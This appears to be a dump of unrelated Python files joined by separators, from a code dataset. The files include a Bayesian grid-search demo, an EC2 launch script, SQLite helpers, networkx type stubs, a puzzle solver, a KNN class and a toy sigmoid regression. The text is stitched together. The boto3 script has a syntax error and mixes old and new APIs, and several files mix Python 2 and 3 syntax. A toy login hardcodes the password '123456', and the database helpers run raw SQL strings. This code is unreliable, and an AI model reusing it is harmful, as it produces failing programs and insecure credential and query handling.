def update_bayes(prob_vector, guess, direction):
A_prob = prob_vector[guess] # Prior probability of the ball being at the given x or y coordinate
B_prob = 0.5 - (1 / GRID_SIZE)
if direction in ('R', 'D'):
# Probability that 'guess' is to the right of, or below, an unknown spot
B_given_A = guess / GRID_SIZE
elif direction in ('U', 'L'):
B_given_A = (GRID_SIZE - guess - 1) / GRID_SIZE
else:
return A_prob
res = ((B_given_A) * A_prob) / B_prob
return res
# Set the location we are going to try to guess
ball_location = (random.randint(0, GRID_SIZE-1), random.randint(0, GRID_SIZE-1))
# Create the grid
X = np.arange(0, GRID_SIZE, 1)
Y = np.arange(0, GRID_SIZE, 1)
XX, YY = np.meshgrid(X, Y)
# Set Prior Probabilities (Each grid location has equal probability of 1 / GRID_SIZE**2)
X_probs = np.full(GRID_SIZE, 1 / GRID_SIZE)
Y_probs = np.full(GRID_SIZE, 1 / GRID_SIZE)
fig = plt.figure()
ax = Axes3D(fig)
plt.show(block=False)
for _ in range(TESTS):
# Draw the surface
Z = np.matmul(Y_probs.reshape((GRID_SIZE, 1)), X_probs.reshape((1, GRID_SIZE)))
ax.plot_surface(XX, YY, Z, rstride=1, cstride=1, cmap=cm.viridis)
plt.xlabel("X")
plt.ylabel("Y")
plt.pause(0.001)
fig.canvas.flush_events()
plt.cla()
guess_throw = (random.randint(0, GRID_SIZE-1), random.randint(0, GRID_SIZE-1))
if guess_throw[0] < ball_location[0]: # Ball is Right
X_direction = 'R'
elif guess_throw[0] > ball_location[0]: # Ball is Left
X_direction = 'L'
else: # Ball is directly Up/Down
X_direction = None
if guess_throw[1] < ball_location[1]: # Ball is Down
Y_direction = 'D'
elif guess_throw[1] > ball_location[1]: # Ball is Up
Y_direction = 'U'
else: # Ball is directly Right/Left
Y_direction = None
for i in range(GRID_SIZE):
# Update priors
X_probs[i] = update_bayes(X_probs, i, X_direction)
Y_probs[i] = update_bayes(Y_probs, i, Y_direction)
estimation = (np.argmax(X_probs), np.argmax(Y_probs))
error = ((ball_location[0] - estimation[0])**2 + (ball_location[1] - estimation[1])**2)**0.5
print(f"Actual Location: {ball_location}")
print(f"Result: {estimation}")
print(f"Error: {error:.3f}")
|
#!/usr/bin/python
#python instance_creation.py "image_id" "key_name" "instance_type" "subnet_id" "service_name"
import boto3
import sys
image_id = sys.argv[1]
name = sys.argv[2]
key_name = sys.argv[3]
instance_type = sys.argv[4]
subnet_id = sys.argv[5]
service_name = sys.argv[6]
#creating ec2 instance and providing the script in the user-data for the installation of sftp service
ec2 = boto3.connect_ec2()
key_pair = ec2.create_key_pair(key_name)
key_pair.save('/home/shefali/.ssh')
instance = ec2.run_instances(
ImageId = image_id,
MinCount = 1,
MaxCount = 1,
KeyName = key_name,
InstanceType = instance_type,
SubnetId = subnet_id
user_data = "sh service_installation.sh"+service_name
)
#checks for the instance creation and display te public dns name
for i in ec2.get_all_instances():
if i.id == instance.id:
ec2.create_tags(
Resources = [i.id],
Tags = mktag(instance[name])
break
print i.instances[0].public_dns_name
|
# 导入python内置的SQLite驱动:
import sqlite3
import os.path
import logging
base_dir = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(base_dir, "word.db")
def create_table():
"""创建表"""
# 连接到SQLite数据库
# 数据库文件是word.db
# 如果文件不存在,会自动在当前目录创建:
conn = sqlite3.connect(db_path)
# 创建一个Cursor:
cursor = conn.cursor()
with open("db/word.sql", "r", encoding="GBK") as f_r:
f = f_r.read()
# 执行一条SQL语句,创建表:
cursor.executescript(f)
# cursor.execute('create table user (id varchar(20) primary key, name varchar(20))')
# 继续执行一条SQL语句,插入一条记录:
# cursor.execute('insert into user (id, name) values (\'1\', \'Michael\')')
# 通过rowcount获得插入的行数:
row = cursor.rowcount
print(row)
# 关闭Cursor:
cursor.close()
# 提交事务:
conn.commit()
# 关闭Connection:
conn.close()
def insert_data(sql):
"""修改数据"""
conn = sqlite3.connect(db_path)
try:
cursor = conn.cursor()
# 执行sql
response = cursor.execute(sql)
cursor.close()
# 提交事务:
conn.commit()
return response
except Exception as e:
logging.warning('Exception:%s' % e)
finally:
conn.close()
def select_data(sql):
"""查询数据"""
# cursor.execute('select * from word where id=?', ('1',))
conn = sqlite3.connect(db_path)
try:
cursor = conn.cursor()
# 执行sql
cursor.execute(sql)
response = cursor.fetchall()
cursor.close()
return response
except Exception as e:
logging.warning('Exception:%s' % e)
finally:
conn.close()
if __name__ == '__main__':
"""创建表"""
create_table()
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class SearchBar(FlaskForm):
query = StringField('', validators=[DataRequired()])
search_btn = SubmitField('Search')
|
import dash_bootstrap_components as dbc
from dash import html
placeholder = html.Div(
[
dbc.Placeholder(xs=6),
html.Br(),
dbc.Placeholder(xs=4, button=True),
]
)
|
from collections.abc import (
Callable,
Collection,
Hashable,
Iterable,
Iterator,
Mapping,
MutableMapping,
)
from typing import ClassVar, Generic, TypeVar, overload
from _typeshed import Self, Incomplete
from networkx.classes.coreviews import AdjacencyView
from networkx.classes.digraph import DiGraph
from networkx.classes.reportviews import DiDegreeView, NodeView, OutEdgeView
from networkx.convert import _Data
from typing_extensions import TypeAlias
_Node = TypeVar("_Node", bound=Hashable)
Edge: TypeAlias = tuple[_Node, _Node]
EdgePlus: TypeAlias = Edge[_Node] | tuple[_Node, _Node, dict[str, Incomplete]]
MapFactory: TypeAlias = Callable[[], MutableMapping[str, Incomplete]]
NBunch: TypeAlias = None | _Node | Iterable[_Node]
class Graph(Collection[_Node], Generic[_Node]):
node_dict_factory: ClassVar[MapFactory] = ...
node_attr_dict_factory: ClassVar[MapFactory] = ...
adjlist_outer_dict_factory: ClassVar[MapFactory] = ...
adjlist_inner_dict_factory: ClassVar[MapFactory] = ...
edge_attr_dict_factory: ClassVar[MapFactory] = ...
graph_attr_dict_factory: ClassVar[MapFactory] = ...
def to_directed_class(self) -> type[DiGraph[_Node]]: ...
def to_undirected_class(self) -> type[Graph[_Node]]: ...
def __init__(
self, incoming_graph_data: _Data[_Node] | None = None, **attr: Incomplete
) -> None: ...
adj: AdjacencyView[_Node, _Node, dict[str, Incomplete]]
name: str
def __getitem__(self, n: _Node) -> MutableMapping[Hashable, Incomplete]: ...
def __iter__(self) -> Iterator[_Node]: ...
def __contains__(self, n: object) -> bool: ...
def __len__(self) -> int: ...
def add_node(self, node_for_adding: _Node, **attr: Incomplete) -> None: ...
def add_nodes_from(
self,
nodes_for_adding: Iterable[_Node | tuple[_Node, dict[str, Incomplete]]],
**attr: Incomplete
) -> None: ...
def remove_node(self, n: _Node) -> None: ...
def remove_nodes_from(self, nodes: Iterable[_Node]) -> None: ...
nodes: NodeView[_Node]
def number_of_nodes(self) -> int: ...
def order(self) -> int: ...
def has_node(self, n: _Node) -> bool: ...
def add_edge(
self, u_of_edge: _Node, v_of_edge: _Node, **attr: Incomplete
) -> None: ...
def add_edges_from(
self, ebunch_to_add: Iterable[EdgePlus[_Node]], **attr: Incomplete
) -> None: ...
def add_weighted_edges_from(
self,
ebunch_to_add: Iterable[tuple[_Node, _Node, Incomplete]],
weight: str = ...,
**attr: Incomplete
) -> None: ...
def remove_edge(self, u: _Node, v: _Node) -> None: ...
def remove_edges_from(self, ebunch: Iterable[EdgePlus[_Node]]) -> None: ...
@overload
def update(self, edges: Graph[_Node], nodes: None = None) -> None: ...
@overload
def update(
self,
edges: Graph[_Node] | Iterable[EdgePlus[_Node]] | None = ...,
nodes: Iterable[_Node] | None = ...,
) -> None: ...
def has_edge(self, u: _Node, v: _Node) -> bool: ...
def neighbors(self, n: _Node) -> Iterable[_Node]: ...
edges: OutEdgeView[_Node]
def get_edge_data(
self, u: _Node, v: _Node, default: Incomplete = ...
) -> Mapping[str, Incomplete]: ...
def adjacency(
self,
) -> Iterable[tuple[_Node, Mapping[_Node, Mapping[str, Incomplete]]]]: ...
degree: DiDegreeView[_Node]
def clear(self) -> None: ...
def clear_edges(self) -> None: ...
def is_multigraph(self) -> bool: ...
def is_directed(self) -> bool: ...
def copy(self: Self, as_view: bool = ...) -> Self: ...
def to_directed(self, as_view: bool = ...) -> DiGraph[_Node]: ...
def to_undirected(self, as_view: bool = ...) -> Graph[_Node]: ...
def subgraph(self, nodes: Iterable[_Node]) -> Graph[_Node]: ...
def edge_subgraph(self, edges: Iterable[Edge[_Node]]) -> Graph[_Node]: ...
@overload
def size(self, weight: None = ...) -> int: ...
@overload
def size(self, weight: str) -> float: ...
def number_of_edges(self, u: _Node | None = ..., v: _Node | None = ...) -> int: ...
def nbunch_iter(self, nbunch: NBunch[_Node] = ...) -> Iterable[_Node]: ...
|
#!/usr/bin/env python
switches = [
(0, (0, 1, 2)),
(1, (0, 2, 14, 15)),
(2, (3, 7, 9, 11)),
(3, (3, 14, 15)),
(4, (4, 10, 14, 15)),
(5, (4, 5, 7, 14, 15)),
(6, (0, 4, 5, 6, 7)),
(7, (1, 2, 3, 4, 5)),
(8, (6, 7, 8, 10, 12)),
(9, (3, 4, 5, 9, 13))
]
""" sort switch by maxClock """
switches = [ (switchNo, clockNoList) for switchNo, clockNoList in sorted(switches, key=lambda switchInfo : len(switchInfo[1]), reverse=True) ]
sampleMaxCount = int(raw_input())
for sampleNo in range(sampleMaxCount):
#inStr = "12 9 3 12 6 6 9 3 12 9 12 9 12 12 6 6"
inStr = raw_input()
clockStates = [ int(term)/4 for term in inStr.strip().split() ]
switchList = []
while True:
""" check complete? """
if sum(clockStates) == (3*16):
break
""" clock eval """
for swichNo, clockNoList in sorted( switches, key=lambda switchInfo : (sum([ clockStates[clockNo] for clockNo in switchInfo[1]])/float(len(switchInfo[1]))) ):
""" switch click!!! """
for clockNo in clockNoList:
clockStates[clockNo] += 1
if clockStates[clockNo] == 4:
clockStates[clockNo] = 0
#print '*' * 60
#print clockStates, swichNo, sum(clockStates)
switchList.append( swichNo )
break
print len(switchList)
|
name ="zhang"
password ="123456"
username = input("your name:")
pw = input("your password:")
if name == username and password == pw:
print("welcom login")
else:
print("username or password is wrong") |
import unittest
import sys
import os
try:
from flounder.flounder import Flounder
except ImportError:
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
from flounder.flounder import Flounder
DEVELOPER_ACCESS_TOKEN = 'YOUR_DEVELOPER_ACCESS_TOKEN'
class TestFlounder(unittest.TestCase):
def setUp(self):
self.flounder = Flounder(DEVELOPER_ACCESS_TOKEN)
return
def test_create(self):
create_request = self.flounder.create_request('Sushi', 'sushi.csv')
response = create_request.getresponse()
print (response.read())
print (response.status, response.reason)
return
if __name__ == '__main__':
unittest.main() |
def find_character(li,l):
result=[]
for i in li:
if i.find(l)!=-1:
result+=[i]
return result
print find_character(['hello','world','my','name','is','Anna'],"o")==["hello","world"]
|
import numpy as np
import pandas as pd
class KNN:
def __init__(self, k=7):
self.k = k
def fit(self, X_train, Y_train):
self.X_train = X_train
self.Y_train = Y_train
def predict(self, X_test):
self.y_pred = np.array([])
for x in X_test:
dist = np.sum((x-self.X_train)**2, axis=1)
dist = dist.reshape(dist.shape[0], 1)
self.Y_train = self.Y_train.reshape(self.Y_train.shape[0], 1)
distances = np.concatenate((dist,
self.Y_train), axis=1)
# distances = distances.argsort()
distances = distances[distances[:, 0].argsort()]
neighbours = distances[0:self.k]
classes, counts = np.unique(neighbours[:,1], return_counts=True)
self.y_pred = np.append(self.y_pred, classes[np.argmax(counts)])
return self.y_pred
def score(self, y_test, y_pred):
wrong_cnt = 0
right_cnt = 0
for i in range(len(y_test)):
if(y_test[i] == y_pred[i]):
right_cnt += 1
else:
wrong_cnt += 1
return (right_cnt/(right_cnt+wrong_cnt) * 100) |
from matplotlib import pyplot as plt
import numpy as np
#Here is our original data. The format is: [bitcoin price, video games sales, wafer shippments]
#Dollars is the unit for bitcoin price
#Millions of Dollars is the unit for video game sales
#Million of Square Inches (MSI) is the unit for wafer shippments
'''
data = [[415.16, 253, 2537.66], [672.48, 181.5,2705.605],
[608.44, 234.3,2730],[968.23, 997,2764.293],
[1079.75, 485, 2858], [2504.28, 231, 2978],
[4764.87, 168, 2978],[4349.29, 316, 2997],
[13860.14, 1270, 2977]]
'''
#Here is our data with a logarithm. The format is: [log(bitcoin price), log(video games sales)]
data = [[2.62, 2.40, 3.40], [2.83, 2.26, 3.43],
[2.78, 2.37, 3.44],[2.99, 3.00, 3.44],
[3.03, 2.69, 3.46], [3.40, 2.36, 3.47],
[3.68, 2.23, 3.47],[3.63, 2.5, 3.47],
[4.14, 3.1, 3.48]]
#We are going to make a prediction if bitcoin cost 8441.24 and there were 500 million video game sales
today = [3.93, 2.70]
#Activation function
def activation_function(data_point, w1, w2, b):
return data_point[0] * w1 + data_point[1] * w2 + b
#Sigmoid Function
def sigmoid (x):
return 1/(1 + np.exp(-x))
#Derivative of Sigmoid Function
def derivative_sigmoid(x):
return x * (1 - x)
#Training
def train(desired_prediction):
#Get random weights
w1 = np.random.randn()
w2 = np.random.randn()
b = np.random.randn()
#Set parameters for the number of iterations and learning rate
iterations = 550000
learning_rate = 0.00005
#Create an array to track costs
costs = []
for i in range(iterations):
# Generate a random number and get a data point
ri = np.random.randint(len(data))
point = data[ri]
#Once a random data point is choosen we calulate the activation function
z = point[0] * w1 + point[1] * w2 + b
#Set prediction by using the sigmoid function
pred = sigmoid(z)
#The target is the 2nd element (Shippments)
target = point[2]
#Calculate cost
cost = np.square(pred - target)
#Print the cost over all data points every 1k iters
if i % 100 == 0:
c = 0
for j in range(len(data)):
p = data[j]
p_pred = sigmoid(w1 * p[0] + w2 * p[1] + b)
c += np.square(p_pred - p[2])
costs.append(c)
#Calculate the gradient descent
dcost_dpred = 2 * (pred - target)
dpred_dz = derivative_sigmoid(z)
dz_dw1 = point[0]
dz_dw2 = point[1]
dz_db = 1
dcost_dz = dcost_dpred * dpred_dz
dcost_dw1 = dcost_dz * dz_dw1
dcost_dw2 = dcost_dz * dz_dw2
dcost_db = dcost_dz * dz_db
#Setting weights and bias
w1 = w1 - learning_rate * dcost_dw1
w2 = w2 - learning_rate * dcost_dw2
b = b - learning_rate * dcost_db
print()
print('Costs, weights, and bias')
print(costs)
print(w1)
print(w2)
print(b)
print()
print('Prediction')
print(10**activation_function(desired_prediction, w1, w2, b))
#Train and plot
train(today) |
def closest_mod_5(x):
while True:
if x % 5 == 0:
return x
else:
x += 1
x = 31
a = closest_mod_5(x)
print(a)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.